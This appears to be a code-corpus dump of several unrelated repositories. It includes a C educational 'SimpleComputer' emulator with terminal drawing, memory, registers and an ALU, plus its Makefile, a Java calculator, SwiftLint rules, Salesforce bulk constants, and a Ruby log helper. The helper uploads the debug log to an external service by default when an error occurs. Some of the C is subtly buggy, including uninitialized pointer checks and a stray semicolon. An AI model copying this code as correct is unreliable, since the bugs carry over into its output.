printA(BOXCHAR_TL); term_xy(x1,y2); printA(BOXCHAR_BL); term_xy(x2, y1); printA(BOXCHAR_TR); term_xy(x2,y2); printA(BOXCHAR_BR); for(int i = x1 + 1; i < x2; i++) { term_xy(i, y1); printA(BOXCHAR_HOR); term_xy(i, y2); printA(BOXCHAR_HOR); } for(int i = y1 + 1; i < y2; i++) { 
term_xy(x1,i); printA(BOXCHAR_VERT); term_xy(x2,i); printA(BOXCHAR_VERT); } return 0; } int printchar(int *big, int x, int y, enum colors fg, enum colors bg) { int xmax, ymax, pos, bit; char row[9]; get_screen_size(&ymax, &xmax); if(x < 0 || y < 0 || x + 8 > xmax|| y + 8 > ymax) return -1; row[8] = '\0'; fg_color(fg); bg_color(bg); for(int i = 0; i < 8; i++) { for(int j = 0; j < 8; j++) { pos = i >> 2; bit = (big[pos] >> ((i % 4) * 8 + j)) & 1; if(bit == 0) row[j] = ' '; else row[j] = BOXCHAR_REC; } term_xy(x, y + i); for(int i = 0; i < strlen(row); i++) printA(row[i]); } fg_color(DEFAULT); bg_color(DEFAULT); return 0; } int setcharpos(int *big, int x, int y, int value) { int pos = 0; if((x < 0) || (y < 0) || (x > 7) || (y > 7) || (value > 1) || (value < 0)) return -1; if(y <= 3) pos = 0; else pos = 1; y = y % 4; if(value == 0) big[pos] &= ~(1 << (y * 8 + x)); else big[pos] |= (1 << (y * 8 + x)); return 0; } int getcharpos(int *big, int x, int y, int *value) { int pos = 0; if((x < 0) || (y < 0) || (x > 7) || (y > 7)) return -1; if(y <= 3) pos = 0; else pos = 1; y = y % 4; *value = (big[pos] >> (y * 8)) & 1; return 0; } int charwrite(int fd, int *big, int count) { int err = 0; err = write(fd, &count, sizeof(count)); if (err == -1) return -1; err = write(fd, big, count * sizeof(int) * 2); if (err == -1) return -1; return 0; } int charread(int fd, int *big, int nd_count, int *count) { int n, cnt, err; err = read(fd, &n, sizeof(n)); if ((err == -1) || (err != sizeof(n))) return -1; cnt = read(fd, big, nd_count * sizeof(int) * 2); if (cnt == -1) return -1; *count = cnt / (sizeof(int) * 2); return 0; }<file_sep>#include <stdlib.h> #include <stdio.h> #include "sc.h" int commands[38] = {0x10, 0x11, 0x20, 0x21, 0x30, 0x31, 0x32, 0x33, 0x40, 0x41, 0x42, 0x43, 0x51, 0x52, 0x53, 0x54, 0x55, 0x56, 0x57, 0x58, 0x59, 0x60, 0x61, 0x62, 0x63, 0x64, 0x65, 0x66, 0x67, 0x68, 0x69, 0x70, 0x71, 0x72, 0x73, 0x74, 0x75, 0x76 }; int memInit() { free(RAM); RAM = (int*)malloc(memory_size * 
sizeof(int)); if(RAM == NULL) return -1; for(int i = 0; i < memory_size; i++) RAM[i] = 0x0; return 0; } int memSet(int address, int value) { if(address < memory_size && address >= 0x0) { RAM[address] = value; } else { regSet(FLAG_OUTMEM, 0x1); return -1; } return 0x0; } int memGet(int address, int *value) { if(address < memory_size && address >= 0 && value != NULL) { *value = RAM[address]; return 0; } else { regSet(FLAG_OUTMEM, 1); return -1; } } int memSave(const char *filename) { FILE *MEMORYDUMP; MEMORYDUMP = fopen(filename, "wb"); if(MEMORYDUMP == NULL) return -1; else { if(fwrite(RAM, sizeof(*RAM)* memory_size, 1, MEMORYDUMP)); { fclose(MEMORYDUMP); } } return 0; } int memLoad(const char *filename) { FILE *MEMORYDUMP; MEMORYDUMP = fopen(filename, "rb"); if(MEMORYDUMP == NULL) return -1; else { if(fread(RAM, sizeof(*RAM) * memory_size, 1, MEMORYDUMP)) { for(int i = 0; i < memory_size; i++) RAM[i] &= 0x7FFF; fclose(MEMORYDUMP); } } return 0; } int regInit() { registr_ = 0x0; return 0; } int regSet(int reg, int value) { if((reg > 0) && (reg <= 5)) { if(value == 1) { registr_ = registr_ | (1 << (reg - 1)); } else if(value == 0) registr_ = registr_ & (~(1 << (reg - 1))); else return -1; } else return -1; return 0; } int regGet(int reg, int *value) { if((reg > 0) && (reg <= 5)) { *value = (registr_ >> (reg - 1)) & 1; } else return -1; return 0; } int comEnc(int command, int operand, int *value) { int *comptr; for(int i = 0; i < 38; i++) //count of correct commands if(command == commands[i]) comptr = &commands[i]; if(comptr == NULL) { regSet(FLAG_COMMAND, 1); return -1; } if(comptr != NULL) { if(operand > 0x7F) { operand &= 0x7F; regSet(FLAG_OVERFLOW, 1); } if(value != NULL) { *value = (command << 7) | operand; regSet(FLAG_COMMAND, 0); } } return 0; } int comDec(int value, int *command, int *operand) { int *comptr, attr = (value >> 14) & 1, comtmp, optmp; if(command != NULL && operand != NULL) { if(attr == 0) { comtmp = (value >> 7) & 0x7F; optmp = value & 0x7F; 
for(int i = 0; i < 38; i++) if(comtmp == commands[i]) comptr = &commands[i]; } if(comptr != NULL) { *command = comtmp; *operand = optmp; } else { regSet(FLAG_COMMAND, 1); return -1; } } return 0; } <file_sep>#ifndef BC_H #define BC_H #include "../my_term/mt.h" #include <unistd.h> #include <string.h> #include <stdio.h> #include <stdlib.h> #define BOXCHAR_REC 'a' #define BOXCHAR_BR 'j' #define BOXCHAR_BL 'm' #define BOXCHAR_TR 'k' #define BOXCHAR_TL 'l' #define BOXCHAR_VERT 'x' #define BOXCHAR_HOR 'q' void printA(char str); int box(int x1, int y1, int x2, int y2); int printchar(int *big, int x, int y, enum colors fg, enum colors bg); int setcharpos(int *big, int x, int y, int value); int getcharpos(int *big, int x, int y, int *value); int charwrite(int fd, int *big, int count); int charread(int fd, int *big, int nd_count, int *count); #endif<file_sep>#ifndef SC_H #define SC_H #define memory_size 100 #define FLAG_OVERFLOW 1 #define FLAG_DIVIDE 2 #define FLAG_OUTMEM 3 #define FLAG_INTERRUPT 4 #define FLAG_COMMAND 5 int *RAM, registr_; int memInit(); int memSet(int address, int value); int memGet(int address, int *value); int memSave(const char *filename); int memLoad(const char *filename); int regInit(void); int regSet(int reg, int value); int regGet(int reg, int *value); int comEnc(int command, int operand, int *value); int comDec(int value, int *command, int *operand); #endif <file_sep>#include "alu.h" int ALU(int command, int operand) { switch(command) { case 0x10: return READ(operand); case 0x11: return WRITE(operand); case 0x20: return LOAD(operand); case 0x21: return STORE(operand); case 0x30: return ADD(operand); case 0x31: return SUB(operand); case 0x32: return DIVIDE(operand); case 0x33: return MUL(operand); case 0x40: return JUMP(operand); case 0x41: return JNEG(operand); case 0x42: return JZ(operand); case 0x43: return HALT(operand); case 0x51: return NOT(operand); case 0x52: return AND(operand); case 0x53: return OR(operand); case 0x54: return XOR(operand); 
case 0x55: return JNS(operand); case 0x56: return JC(operand); case 0x57: return JNC(operand); case 0x58: return JP(operand); case 0x59: return JNP(operand); case 0x60: return CHL(operand); case 0x61: return SHR(operand); case 0x62: return RCL(operand); case 0x63: return RCR(operand); case 0x64: return NEG(operand); case 0x65: return ADDC(operand); case 0x66: return SUBC(operand); case 0x67: return LOGLC(operand); case 0x68: return LOGRC(operand); case 0x69: return RCCL(operand); case 0x70: return RCCR(operand); case 0x71: return MOVA(operand); case 0x72: return MOVR(operand); case 0x73: return MOVCA(operand); case 0x74: return MOVCR(operand); default: regSet(FLAG_COMMAND, 0x1); return -1; } }<file_sep>#ifndef ALU_H #define ALU_H #include "cmd_handler.h" int ALU(int command, int operand); #endif<file_sep>#include "cmp.h" int acc = 0x0, inst_cnt = 0x0, operation = 0x0, cur_cell = 0x0, hand_exit = 0x1; enum keys key = other_key; const char flags[5] = {'O', 'D', 'M', 'I', 'C'}; char bigchar_0[64] = { 0, 0, 1, 1, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 1, 1, 1, 1, 0, 0 }; char bigchar_1[64] = { 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0 }; char bigchar_2[64] = { 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0 }; char bigchar_3[64] = { 0, 0, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 1, 1, 1, 1, 0 }; char bigchar_4[64] = { 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 
0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0 }; char bigchar_5[64] = { 0, 0, 1, 1, 1, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 1, 1, 1, 1, 0 }; char bigchar_6[64] = { 0, 0, 1, 1, 1, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 1, 1, 1, 1, 0 }; char bigchar_7[64] = { 0, 0, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0 }; char bigchar_8[64] = { 0, 0, 1, 1, 1, 1, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 1, 1, 1, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 1, 1, 1, 1, 0 }; char bigchar_9[64] = { 0, 0, 1, 1, 1, 1, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 1, 1, 1, 1, 1, 0 }; char bigchar_A[64] = { 0, 0, 1, 1, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0, 0, 1, 0 }; char bigchar_B[64] = { 0, 1, 1, 1, 1, 0, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0, 0, 1, 1, 1, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 1, 1, 1, 1, 1, 0, 0 }; char bigchar_C[64] = { 0, 0, 1, 1, 1, 1, 1, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 0 }; char bigchar_D[64] = { 0, 1, 1, 1, 1, 0, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0, 1, 
0, 0, 0, 1, 1, 1, 1, 0, 0, 0 }; char bigchar_E[64] = { 0, 1, 1, 1, 1, 1, 1, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0 }; char bigchar_F[64] = { 0, 1, 1, 1, 1, 1, 1, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0 }; char bigchar_PLUS[64] = { 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0 }; char *ind[17] = {bigchar_0, bigchar_1, bigchar_2, bigchar_3, bigchar_4, bigchar_5, bigchar_6, bigchar_7, bigchar_8, bigchar_9, bigchar_A, bigchar_B, bigchar_C, bigchar_D, bigchar_E, bigchar_F, bigchar_PLUS}; void init_sig_handlers() { signal(SIGALRM, cell_step); signal(SIGUSR1, return_hand_manage); timer.it_value.tv_sec = 4; timer.it_value.tv_usec = 0; timer.it_interval.tv_sec = 1; timer.it_interval.tv_usec = 500; setitimer(ITIMER_REAL, &timer, NULL); regSet(FLAG_INTERRUPT, 0x1); } void return_hand_manage(int sig) { regSet(FLAG_INTERRUPT, 1); } void cell_step(int sig) { int val; regGet(FLAG_INTERRUPT, &val); if(val == 0) { cur_cell = inst_cnt; print_ram(&cur_cell); print_inst_cnt(); print_operation(); print_cur_cell(); print_flags(); inst_cnt++; if(inst_cnt > 0x63) inst_cnt = 0; } } int set_non_canonical_regime(int vmin, int echo) { if(set_term_regime(0, 0, vmin, echo, 1)) return 0; else return -1; } void key_handler(enum keys key) { char buf[4]; read_key(&key); int val; regGet(FLAG_INTERRUPT, &val); if(key == i_key) { raise(SIGUSR1); } if(val == 1) { switch(key) { case up_key: // cur_cell -= 0xA; break; case down_key: // cur_cell += 0xA; break; case left_key: // cur_cell -= 0x1; break; case right_key: //change cells cur_cell += 0x1; break; case q_key: //exit hand_exit = 0x0; break; case 
f5_key: //set accumulator set_non_canonical_regime(0x4, 0x0); read(FD, buf, sizeof(buf)); acc = atoi(buf); set_non_canonical_regime(0x1, 0x0); break; case f6_key: //set instruction counter inst_cnt = cur_cell; break; case t_key: setitimer(ITIMER_REAL, &timer, NULL); regSet(FLAG_INTERRUPT, 0); break; case enter_key: set_non_canonical_regime(0x4, 0x0); read(FD, buf, sizeof(buf)); RAM[cur_cell] = atoi(buf); set_non_canonical_regime(0x1, 0x0); break; default: key = other_key; break; } } if(cur_cell > 0x63)// 0x63 = 99 cur_cell = 0x0; if(cur_cell < 0x0) cur_cell = 0x63; memGet(cur_cell, &operation); } void print_cur_cell() { int start_x = 45; const int y = 16; int big[2] = {0, 0}; int tmp = RAM[cur_cell]; for(int i = 0; i < 4; i++) { transform_bchar(ind[tmp % 10], big); printchar(big, start_x, y, BLUE, DEFAULT); start_x -= 9; tmp /= 10; } transform_bchar(ind[16], big); //bigchar PLUS is 17 element in array printchar(big, start_x, y, YELLOW, DEFAULT); } void print_ram(int *cell) { for(int i = 0; i < memory_size / 10; i++) { term_xy(RAM_X + 1, RAM_Y + i + 1); for(int j = 0; j < memory_size / 10; j++) { char buf[6]; sprintf(buf, "+%04d ", RAM[i * 10 + j]); if(*cell == i * 10 + j) bg_color(GREEN); write(FD, buf, strlen(buf)); bg_color(DEFAULT); } } } void print_acc() { term_xy(ACC_X + 9, ACC_Y + 1); char buf[5]; sprintf(buf, "+%04d", acc); write(FD, buf, strlen(buf)); } void print_inst_cnt() { term_xy(INST_CNT_X + 9, INST_CNT_Y + 1); char buf[5]; sprintf(buf, "+%04d", inst_cnt); write(FD, buf, strlen(buf)); } void print_operation() { term_xy(OPER_X + 7, OPER_Y + 1); char buf[8]; sprintf(buf, "+%02d : %02d", operation / 100, operation % 100); write(FD, buf, strlen(buf)); } void print_flags() { int start_x = 64 + 1; const int y = 11 + 1; fg_color(GREEN); for(int i = 0; i < 5; i++) { int val; regGet(i+1, &val); term_xy(start_x, y); if(val == 1) { char flag[4]; sprintf(flag, "%c", flags[i]); write(FD, flag, strlen(flag)); } else write(FD, " ", 1); start_x += 4; } 
fg_color(DEFAULT); } void transform_bchar(char *sym, int *big) //transform bigchar to int big[2] { int x, y; for(int i = 0; i < 64; i++) { x = i % 8; y = i / 8; setcharpos(big, x, y, sym[i]); } }<file_sep>CMP = gcc CFLAGS = -Wall -c LFLAGS = -Llib -lSC -lMTBC -g -o BDIR = "build/SimpleComputer" all: main main: build/main.o build/cmp.o build/mf.o build/rk.o lib/libSC.a lib/libMTBC.a tasm build/cmd_handler.o build/alu.o @mkdir -p bin @echo "\033[32mBuild main: \033[0m" $(CMP) build/main.o build/cmp.o build/cmd_handler.o build/alu.o build/mf.o build/rk.o $(LFLAGS) bin/SimpleComputer @echo "\033[35m*************************************" @echo "Input /"make run"/ for start program" @echo "*************************************\033[0m" tasm: asm_translator/tasm.c @mkdir -p bin @$(CMP) asm_translator/tasm.c -Llib -lSC -o bin/tasm build/main.o: main.c @mkdir -p build @$(CMP) $(CFLAGS) main.c -o $@ build/cmp.o: cmp.c @mkdir -p build @$(CMP) $(CFLAGS) cmp.c -o $@ build/alu.o: cpu/alu.c @mkdir -p build @$(CMP) $(CFLAGS) cpu/alu.c -o $@ build/cmd_handler.o: cpu/cmd_handler.c @mkdir -p build @$(CMP) $(CFLAGS) cpu/cmd_handler.c -o $@ build/mf.o: main_frame/mf.c @mkdir -p build @$(CMP) $(CFLAGS) main_frame/mf.c -o $@ build/rk.o: read_keys/rk.c @mkdir -p build @$(CMP) $(CFLAGS) read_keys/rk.c -o $@ lib/libSC.a: build/sc.o @echo "\033[32mBuild Simple Computer static lib: \033[0m" @mkdir -p lib ar rc lib/libSC.a build/sc.o ranlib lib/libSC.a lib/libMTBC.a: build/mt.o build/bc.o @echo "\033[32mBuild My Term & Big Char static lib: \033[0m" @mkdir -p lib ar rc lib/libMTBC.a build/mt.o build/bc.o ranlib lib/libMTBC.a build/sc.o: simple_computer/sc.c @mkdir -p build @$(CMP) $(CFLAGS) simple_computer/sc.c -o $@ build/mt.o: my_term/mt.c @mkdir -p build @$(CMP) $(CFLAGS) my_term/mt.c -o $@ build/bc.o: big_chars/bc.c @mkdir -p build @$(CMP) $(CFLAGS) big_chars/bc.c -o $@ re: clean main run: @./bin/SimpleComputer clean: rm -rf build bin lib
f8cd42cc03cfaa13fe30344793cd2c79eaa117b9
[ "Markdown", "C", "Makefile" ]
20
C
M1dNightSIB/ArchCourse
39982e4ce9e606fefd3fa6da9b22596f01cd08f5
f68a4ea9775b9873eadfa0f88bc95f2d945633a8
refs/heads/master
<file_sep>import java.util.*; public class Calculator { public static final String OPERATORS = "+-*/()"; public static String calculate(ArrayList<String> tok, int id) { StackOfOperands stack = new StackOfOperands(); ArrayList<Object> obj = new ArrayList<>(); for (int i = 0; i < tok.size(); i++) { if (OPERATORS.indexOf(tok.get(i)) == -1) { Numbers a = null; if (id == 0) { a = new Real(); } else if (id == 1) { a = new Rational(); } else if (id == 2) { a = new Complex(); } obj.add(a.parse(tok.get(i))); } else { obj.add(tok.get(i)); } } for (Object a : obj) { if (a instanceof String) { if (a.equals("+")) { Numbers a1 = stack.oPop(); Numbers a2 = stack.oPop(); stack.push(a1.add(a2)); } else if (a.equals("-")) { Numbers a1 = stack.oPop(); Numbers a2 = stack.oPop(); stack.push(a1.subtract(a2)); } else if (a.equals("*")) { Numbers a1 = stack.oPop(); Numbers a2 = stack.oPop(); stack.push(a1.multiply(a2)); } else if (a.equals("/")) { Numbers a1 = stack.oPop(); Numbers a2 = stack.oPop(); stack.push(a1.divide(a2)); } } else { stack.push((Numbers) a); } } if (stack.oSize() == 1) return "= " + stack.oPop(); else throw new IllegalArgumentException("Wrong arguments"); } } <file_sep> public class Complex implements Numbers { private double re; private double im; Complex(double rea, double ima) { re = rea; im = ima; } Complex() { } public String toString() { String a; if (im < 0) { a = String.format("[%.2f, %.2fi]", re, (-im)); return a; } a = String.format("[%.2f, %.2fi]", re, im); return a; } // (a+bi)+(c+di)=(a+c)+(b+d)i. 
public Complex add(Complex b) { Complex a = this; double real = a.re + b.re; double imag = a.im + b.im; return new Complex(real, imag); } // (a+bi)-(c+di)=(a-c)+(b-d)i.\ public Complex subtract(Complex b) { Complex a = this; double real = a.re - b.re; double imag = a.im - b.im; return new Complex(real, imag); } public Complex multiply(Complex b) { Complex a = this; double real = a.re * b.re - a.im * b.im; double imag = a.re * b.im + a.im * b.re; return new Complex(real, imag); } public Complex reciprocal() { double scale = re * re + im * im; return new Complex(re / scale, -im / scale); } public Complex divide(Complex b) { Complex a = this; return a.multiply(b.reciprocal()); } @Override public Numbers add(Numbers other) { return ((Complex) this).add((Complex) other); } @Override public Numbers subtract(Numbers other) { return ((Complex) this).subtract((Complex) other); } @Override public Numbers multiply(Numbers other) { return ((Complex) this).multiply((Complex) other); } @Override public Numbers divide(Numbers other) { return ((Complex) this).divide((Complex) other); } @Override public Numbers parse(String com) { Double r1 = Double.parseDouble(com.substring(0, com.indexOf(","))); Double i2 = Double.parseDouble(com.substring(com.indexOf(",") + 1, com.indexOf("i"))); return new Complex(r1, i2); } } <file_sep> import java.util.*; public class Converter { public static final String OPERATORS = "+-*/()"; public static ArrayList parseTokens(String a) { Scanner sc = new Scanner(a); ArrayList<String> out = new ArrayList<>(); for (int i = 0; i < a.length(); i++) { if (a.charAt(i) == '[') { String z = new String(); i++; while (a.charAt(i) != ']') { z += a.charAt(i); i++; } out.add(z); continue; } else if (a.charAt(i) == '-' ? (a.charAt(i + 1) == ' ') : OPERATORS.indexOf(a.charAt(i)) != -1) { String z = new String(); z += a.charAt(i); out.add(z); continue; } else { String z = new String(); while (Character.isDigit(a.charAt(i)) || a.charAt(i) == '.' 
|| a.charAt(i) == '-' && a.charAt(i) != ' ') { z += a.charAt(i); i++; if (i == a.length()) break; } if (z.length() != 0) if (z.charAt(0) != ' ') { out.add(z); --i; } } } return out; } public static ArrayList in2po(ArrayList<String> token) { ArrayList<String> out = new ArrayList<String>(); StackOfOperands stack = new StackOfOperands(); for (int i = 0; i < token.size(); i++) { String z = token.get(i); int ind = OPERATORS.indexOf(z.charAt(0)); if (z.charAt(0) == '-' ? z.length() > 1 : Character.isDigit(z.charAt(0))) { // if token is a number out.add(z); continue; } else if (ind != -1 && ind < 4) // if token is operator except "(" ")" { if (!stack.isEmpty()) while (!stack.isEmpty() && Prec(stack.peek().charAt(0)) >= Prec(z.charAt(0))) out.add(stack.pop()); stack.push(z); continue; } else if (z.charAt(0) == '(') { stack.push(z); continue; } else if (z.charAt(0) == ')') { while (!stack.isEmpty() && stack.peek().charAt(0) != '(') out.add(stack.pop()); if (!stack.isEmpty() && stack.peek().charAt(0) != '(') throw new IllegalArgumentException("Invalid Expression"); // invalid expression else stack.pop(); continue; } } while (!stack.isEmpty()) out.add(stack.pop()); return out; } static int Prec(char ch) { switch (ch) { case '+': case '-': return 1; case '*': case '/': return 2; } return -1; } }
30399ea7c2920c17fe60fcef941bd4ebb2980711
[ "Java" ]
3
Java
MrBrother/Calculator-on-Java
e2b7baa52797ef1864c1deb32ce833f2ccc5366d
e60032d5bc951123d003cdf372b92caf047f12e9
refs/heads/master
<file_sep>/// All possible configuration errors. public enum ConfigurationError: Error { /// The configuration didn't match internal expectations. case unknownConfiguration /// The configuration had both `match_kind` and `excluded_match_kind` parameters. case ambiguousMatchKindParameters } <file_sep>import SourceKittenFramework public struct InclusiveLanguageRule: ASTRule, ConfigurationProviderRule { public var configuration = InclusiveLanguageConfiguration() public init() {} public static let description = RuleDescription( identifier: "inclusive_language", name: "Inclusive Language", description: """ Identifiers should use inclusive language that avoids discrimination against groups of people based on \ race, gender, or socioeconomic status """, kind: .style, nonTriggeringExamples: InclusiveLanguageRuleExamples.nonTriggeringExamples, triggeringExamples: InclusiveLanguageRuleExamples.triggeringExamples ) public func validate(file: SwiftLintFile, kind: SwiftDeclarationKind, dictionary: SourceKittenDictionary) -> [StyleViolation] { guard kind != .varParameter, // Will be caught by function declaration let name = dictionary.name, let nameByteRange = dictionary.nameByteRange else { return [] } let lowercased = name.lowercased() guard let term = configuration.allTerms.first(where: lowercased.contains) else { return [] } return [ StyleViolation( ruleDescription: Self.description, severity: configuration.severity, location: Location(file: file, byteOffset: nameByteRange.location), reason: "Declaration \(name) contains the term \"\(term)\" which is not considered inclusive." ) ] } }
1fd77f15960f49dc0d24969fff5c350cdea09348
[ "Swift" ]
2
Swift
namolnad/SwiftLint
07f559549a014f23ce87f572df37c6db7bba7a5d
fd5ce985391e768454ae4c6ca48034a052872bdc
refs/heads/master
<file_sep>""" (from https://developer.salesforce.com/docs/atlas.en-us.api_asynch.meta/api_asynch/asynch_api_batches_interpret_status.htm) The following list gives you more details about the various states, also known as statuses, of a batch. The batch state informs you whether you should proceed to get the results or whether you need to wait or fix errors related to your request. Queued ******* Processing of the batch has not started yet. If the job associated with this batch is aborted, the batch isn’t processed and its state is set to Not Processed. InProgress *********** The batch is being processed. If the job associated with the batch is aborted, the batch is still processed to completion. You must close the job associated with the batch so that the batch can finish processing. Completed ********** The batch has been processed completely, and the result resource is available. The result resource indicates if some records have failed. A batch can be completed even if some or all the records have failed. If a subset of records failed, the successful records aren’t rolled back. Failed ******* The batch failed to process the full request due to an unexpected error, such as the request is compressed with an unsupported format, or an internal server error. Even if the batch failed, some records could have been completed successfully. If the numberRecordsProcessed field in the response is greater than zero, you should get the results to see which records were processed, and if they were successful. Not Processed ************** The batch won’t be processed. This state is assigned when a job is aborted while the batch is queued. For bulk queries, if the job has PK chunking enabled, this state is assigned to the original batch that contains the query when the subsequent batches are created. After the original batch is changed to this state, you can monitor the subsequent batches and retrieve each batch’s results when it’s completed. 
""" ABORTED = 'Aborted' FAILED = 'Failed' NOT_PROCESSED = 'Not Processed' COMPLETED = 'Completed' ERROR_STATES = ( ABORTED, FAILED, NOT_PROCESSED, ) <file_sep>from .salesforce_bulk import SalesforceBulk from .csv_adapter import CsvDictsAdapter __version__ = '1.1.0BV'
4a7ac76faa67193c5b8da8a179ff571996d7b7a5
[ "Python" ]
2
Python
bluevine-dev/salesforce-bulk
e0f32937ddec072da371b10206bf68d3d896a439
34585757aa17ecf3aa6d5f0b62ec05556cf7b8a6
refs/heads/master
<file_sep>require 'json' require 'securerandom' require 'time' require 'net/http' require 'uri' $error = false $uuid = SecureRandom.uuid $out_file = File.new(".debug.log", 'w') $out_file.flush def $stdout.write message if message.gsub(/\r?\n/, "") != '' date = ::Time.now append "info", date.utc.iso8601(6), message date_string=date.strftime("%d.%m.%Y %T") message=date_string + " " + message.gsub(/\r\n/, "\n") end super message end def $stderr.write message $error = true if message.gsub(/\r?\n/, "") != '' date = ::Time.now append "error", date.utc.iso8601(6), message date_string=date.strftime("%d.%m.%Y %T") message=date_string + " " + message.gsub(/\r\n/, "\n") end super message end def append type, date_string, message tempHash = { "@timestamp" => date_string, "uuid" => $uuid, "log_type" => type, "message" => message.encode('utf-8', 'binary', :undef => :replace) } $out_file.write JSON.generate(tempHash) + "\n" $out_file.flush end at_exit do if ($error) if((ENV["SENDERROR"] || "") != "") puts "Read senderror from ENV: #{ENV["SENDERROR"]}" @send = ENV["SENDERROR"] else print "Send the Error to the LiDOP team: [yes]: " @send = STDIN.gets.chomp end if(@send == "" || @send == "yes") uri = URI.parse("http://listener.logz.io:8070?token=B<KEY>&type=http_bulk") request = Net::HTTP::Post.new(uri) request.body = "" request.body << File.read(".debug.log") req_options = { use_ssl: uri.scheme == "https", } response = Net::HTTP.start(uri.hostname, uri.port, req_options) do |http| http.request(request) end puts "Result: #{response.code}" end end end <file_sep>require 'yaml' require 'fileutils' require "open3" # load all needed vagrant helper files Dir["#{File.dirname(__FILE__)}/vagrant/Vagrantfile.*.rb"].each {|file| require file } # if the .config file not exists, create a default one out of the template config_file="#{File.dirname(__FILE__)}/.lidop_config.yaml" if(File.exist?(config_file)) else 